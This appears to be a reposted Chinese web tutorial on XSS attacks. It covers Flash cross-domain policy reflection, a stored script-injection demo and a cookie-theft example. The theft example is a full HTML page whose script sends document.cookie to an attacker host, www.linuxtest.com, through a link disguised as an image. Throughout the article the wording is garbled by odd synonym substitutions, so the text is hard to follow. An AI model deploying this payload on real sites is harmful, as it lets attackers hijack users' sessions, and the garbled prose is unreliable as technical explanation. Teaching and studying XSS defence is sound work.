|
有些开拓职员通过把相应的MIME范例配置为text/plain可能除text /html以外的任何对象来防备AJAX相应被注入HTML。HTML注入将无法举办,由于赏识器不会把相应表明为HTML。然而,Flash并不体谅跨域计策文件是哪种MIME范例,以是进攻者有也许行使AJAX相应来反射一个不安详的跨域计策文件。
这应承恶意的Flash应用措施以受害者名义向有瑕玷的Web应用措施发送哀求,读取该域上的恣意的页面,并建设达到该域的套按字毗连。这种范例的进攻的威胁相对较弱,由于恶意的Flash应用措施不能窃取Cookie(可是它如故可以以用户的名义来完成任何举措),并且它不能在受害的用户前仿照成应用措施,除非恶意的Flash应用措施将用户重定向到一个进攻者节制下的域。
然而,到今朝为止,HTML注入所能做的最险恶的工作照旧在受害用户今朝把本身装扮成Web应用措施,虽然,通过其余要领也可以到达此目标,好比反射一个不安详的跨域计策文件,并行使ActionScript的XML类发送HTTP的GET和POST哀求而且读取相应。 在下一节中,我们描写进攻是怎样作恶的。
六、XSS进攻实例说明
例1、简朴XSS进攻
留言类,简朴注入javascript
有个表单域:
- <input type="text" name="content" value="这里是用户填写的数据">
- <script>alert('foolish!')</script>(可能<script type="text/javascript" src="./xss.js"></script>)
提交后将会弹出一个foolish告诫窗口,接着将数据存入数据库
比及此外客户端哀求这个留言的时辰,将数据取出表现留言时将执行进攻代码,将会表现一个foolish告诫窗口。
【将数据改成html标签举办进攻,则会将本来的样式打乱。】
例2、偷取cookie
- 网站地址域名为www.test88.com、进攻者节制的主机www.linuxtest.com
- test88.com中的表单,xss.html

- 恶意进攻者插入响应代码

- 数据(进攻代码)插入数据库
- 进攻者节制的主机中配置吸取偷取的cookie

开始模仿测试
(1) test88.com中配置天生sessionID代码
(2) 客户端会见上面代码并生本钱身的sessionID
(3) 客户端会见xss.html
#下面为模仿被进攻后取出数据的xss.html代码(表现数据)
- <!DOCTYPE html>
- 2 <html>
- 3 <head>
- 4 <title>xss进攻</title>
- 5 <meta charset="utf-8">
- 6 </head>
- 7 <body>
- 8 <form action="./test99.php" method="post">
- 9 留言:<input type="text" name="content" value=""><br/>
- 10 <input type="submit" name="" value='提交'>
- 11 </form>
- 12 <br/>留言记录:<br/>
- 13 <script>
- 14 var Str=document.cookie; //获取cookie
- 15 var a =document.createElement('a'); //建设a标签
- 16 a.href='http://www.linuxtest.com/test2.php?'+Str; //进攻者主机
- 17 a.innerHTML="<img src='./aa.jpg'>"; //呵护图片
- 18 document.body.appendChild(a); //将标签添加到页面中
- 19 </script>
- 20 </body>
- 21 </html>

(4) 客户端不警惕点击到图片,sessionID将被盗

(编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|